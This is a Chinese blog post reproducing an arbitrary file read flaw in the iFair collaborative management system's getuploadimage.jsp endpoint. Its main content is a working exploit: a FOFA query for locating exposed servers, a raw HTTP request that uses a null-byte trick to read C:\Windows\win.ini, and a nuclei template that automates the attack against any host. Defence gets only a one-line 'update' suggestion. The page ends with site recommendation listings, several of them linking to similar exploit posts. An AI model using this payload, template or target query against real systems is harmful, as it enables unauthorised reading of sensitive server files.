企语iFair-协同管理系统-任意文件读取

已于 2024-09-18 14:30:25 修改
阅读量290 收藏 2
点赞数 11
分类专栏: 漏洞复现 文章标签: 漏洞
于 2024-09-18 14:28:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/142332249
版权

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

企语iFair协同管理系统getuploadimage.jsp接口处存在任意文件读取漏洞,可以读取系统文件配置

搜索语法

fofa

app="服务社-企语iFair"

漏洞复现

payload

GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png  HTTP/1.1
Host: 
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

在这里插入图片描述

yaml

id: template-id

info:
  name: Template Name
  author: 'xl'
  severity: info
  description: description
  reference:
    - https://
  tags: tags

http:
  - raw:
      - |+
        GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png  HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Accept-Language: zh-CN
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - extensions
      - type: status
        status:
          - 200

修复建议

更新到最新版本

iFair 协同管理系统 任意文件读取漏洞复现(CVE-2023-47473)
0xSec
01-04 889
iFair协同管理系统getuploadimage.jsp接口处存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取服务器敏感信息,使系统处于极不安全状态。
漏洞复现】iFair协同管理系统任意文件读取漏洞
晚风不及你
02-17 892
iFair协同管理系统是一款专业的协同办公软件,该管理系统兼容性强,适合多种业类型。
iFair协同管理系统getuploadimage,直接上干货
m0_60607675的博客
04-09 673
CNNVD编号:CNNVD-202401-177。
业管理系iFair(F23.2_a0)在Debian操作系统中的安装
lggirls的博客
02-12 571
起因:在安装了F24.8版本后,发现生产用环境和测试、开发用环境还是分开的好。旧版的用来实验、测试,新版的一步一步小心的配置、使用是比较稳妥的操作。因此,决定在KVM虚拟机上搭建一个F23.2版本的系统。
漏洞复现-iFair协同管理系统getuploadimage.jsp接口任意文件读取漏洞(附带漏洞检测脚本)
jjjj1029056414的博客
01-21 533
漏洞复现-iFair协同管理系统getuploadimage.jsp接口任意文件读取漏洞,附带自己写的poc脚本
iFair协同管理系统getuploadimage.jsp接口存在任意文件读取漏洞CVE-2023-47473
nnn2188185的博客
01-20 164
iFair协同管理系统getuploadimage.jsp接口存在任意文件读取漏洞CVE-2023-47473
漏洞复现】协同办公管理系统任意文件读取
失心少年
01-06 479
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!iFair协同管理系统是一款专业的协同办公软件,该管理系统兼容性强,适合多种业类型。iFair协同管理系统同时兼容了Linux、Windows两种操作系统,用户可以根据自己需求进行安装使用。
服务社-系统-F_air21.8的Debian11安装方法,也叫协同管理系统
lggirls的博客
11-23 2407
因为公司发展,计划上管理系统,考察了几个开源的管理软件,感觉针对国内应用环境和小公司的基本需求,做的不是很好,于是转向了国产开发的系统。这样发现了一个我感觉比较满意的,就是标题所示,服务社出的免费协同管理系统OA,软件里面叫系统,网上一般说协同管理系统。 虽然在其官网上说再Linux和Windows系统上都可以安装,但是经过我的搜索,其官方给出的仅仅是CentOS系统下的自动安装脚本。网络上也有几个文库里面,还能找到关于10.3,13.0的linux安装的介绍。 因为centos 2021年底就不再
基于CST软件的三维超材料能带计算及其应用
04-28
内容概要:本文介绍了如何利用CST软件进行三维超材料的能带计算。首先概述了三维超材料的独特性质及其广泛应用前景,接着简要介绍了CST软件的功能特点。随后详细阐述了能带计算的具体步骤,包括模型建立、材料参数设置、网格划分与求解设置以及最终的计算与结果分析。最后给出了一段Python代码示例,展示了如何处理CST输出的数据并绘制能带图。文章强调了计算机模拟技术对于深入了解超材料电子结构和物理性质的重要性。 适合人群:从事材料科学研究的专业人士,尤其是对三维超材料和电磁场模拟感兴趣的科研工作者和技术人员。 使用场景及目标:适用于希望借助CST软件开展三维超材料能带计算的研究项目,旨在提高对超材料的理解,推动相关领域的技术创新和发展。 其他说明:文中提供的Python代码仅为示例,在实际操作时可根据具体情况进行调整优化。同时,掌握CST软件的基本操作和电磁理论基础知识有助于更好地理解和应用本文内容。
基于FPGA的永磁同步伺服系统设计:电流环及矢量控制实现
最新发布
04-28
内容概要:本文详细介绍了基于FPGA的永磁同步伺服系统的矢量控制设计,涵盖了从电流环到速度环的关键模块实现。具体包括Clarke和Park变换、PI调节器、AD7606采样、正交编码器反馈以及SVPWM生成等部分。文中提供了详细的Verilog代码片段,展示了各个模块的具体实现方法和技术细节。特别强调了定点数处理、时序设计和跨时钟域处理等方面的技术挑战及其解决方案。 适合人群:具备一定FPGA开发经验和电机控制基础知识的研发人员。 使用场景及目标:适用于希望深入了解FPGA在电机控制应用中的具体实现方式,特别是矢量控制和电流环设计的专业人士。目标是掌握FPGA平台下高效、低延迟的电机控制系统设计方法。 阅读建议:由于涉及大量具体的Verilog代码和硬件设计细节,建议读者在阅读过程中结合实际项目进行实验和调试,以便更好地理解和掌握相关技术。
飞机大战:从运动方程到战斗系统的全链路设计解析
04-28
经典飞机大战游戏是理解实时交互系统设计的绝佳载体。本文将深入剖析现代空战游戏的核心模块,涵盖刚体运动学、弹道轨迹优化、碰撞检测算法等关键技术,揭示二维游戏背后复杂的三维数学建模过程。
scratch少儿编程逻辑思维游戏源码-冰塔.zip
04-28
scratch少儿编程逻辑思维游戏源码-冰塔.zip
scratch少儿编程逻辑思维游戏源码-弹跳(4).zip
04-28
scratch少儿编程逻辑思维游戏源码-弹跳(4).zip
COMSOL焊接热源模型解析:双椭球、高斯旋转体与柱状体热源的应用与优化
04-28
内容概要:本文详细介绍了COMSOL软件中三种常见的焊接热源模型——双椭球热源、高斯旋转体热源和柱状体热源。双椭球热源适用于模拟移动热源(如激光焊、电弧焊),通过调整轴向系数a1和a2来控制热流分布;高斯旋转体热源适合小范围焊接,采用三维高斯函数描述热流密度;柱状体热源则用于深熔焊场景,特点是计算速度快。文中还提供了每种模型的具体代码实现,并强调了调试时需要注意的关键点,如时间步长、网格加密等。此外,作者分享了一些实用技巧,如将热源参数设置为全局变量并利用参数扫描功能提高调试效率。 适合人群:从事焊接工艺仿真、材料加工领域的研究人员和技术人员,以及对COMSOL建模感兴趣的工程技术人员。 使用场景及目标:帮助用户选择合适的热源模型进行焊接模拟,确保模拟结果的准确性;提供具体的代码实现和调试方法,使用户能够快速掌握并应用于实际项目中。 其他说明:文中提到的热源模型不仅限于理论介绍,还包括实际操作中的注意事项和优化建议,有助于提升模拟效果和工作效率。
基于RBF神经网络的PID控制器在PMSM转速环中的Simulink模型设计与性能分析
04-28
内容概要:本文介绍了将基于RBF神经网络的PID控制器应用于永磁同步电机(PMSM)转速环控制的方法及其性能优势。传统的PID控制器在面对非线性和时变系统时存在参数整定困难的问题,而引入RBF神经网络可以实现实时在线调参,提高系统的灵活性和鲁棒性。文中详细描述了Simulink模型的设计,特别是Matlab s-function模块中RBF神经网络的具体实现,包括高斯函数激活和带惯性的权值更新机制。实验结果显示,在转速突变情况下,改进后的控制器能够迅速稳定系统,超调量控制在2%以内,调节时间较传统方法缩短约40%,并且在负载变化时表现出色,无需重新整定参数。 适合人群:从事电机控制系统研究和开发的技术人员,尤其是对PID控制器优化感兴趣的工程师。 使用场景及目标:适用于需要提升PMSM转速环控制精度和响应速度的应用场合,如工业自动化设备、机器人等领域。目标是通过引入智能算法解决传统PID控制器参数整定难题,提高系统性能。 阅读建议:关注RBF神经网络与PID控制器结合的具体实现细节,特别是在Matlab s-function模块中的编码技巧以及参数调整策略。同时,注意学习率的选择和动量项的作用,这对于实际应用至关重要。
scratch少儿编程逻辑思维游戏源码-GTA 6.zip
04-28
scratch少儿编程逻辑思维游戏源码-GTA 6.zip
scratch少儿编程逻辑思维游戏源码-仓鼠跑酷.zip
04-28
scratch少儿编程逻辑思维游戏源码-仓鼠跑酷.zip
scratch少儿编程逻辑思维游戏源码-超级麦克世界.zip
04-28
scratch少儿编程逻辑思维游戏源码-超级麦克世界.zip
航空影像复原MATLAB集成框架工作环境深入解析
在给定文件的压缩包中,仅包含两个文件:“IFAIR.m”和“license.txt”。“IFAIR.m”文件可能是一个Matlab脚本,用于航空影像复原算法的实现,它可能是整个集成框架工作环境的核心组成部分,包含了一系列的函数和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值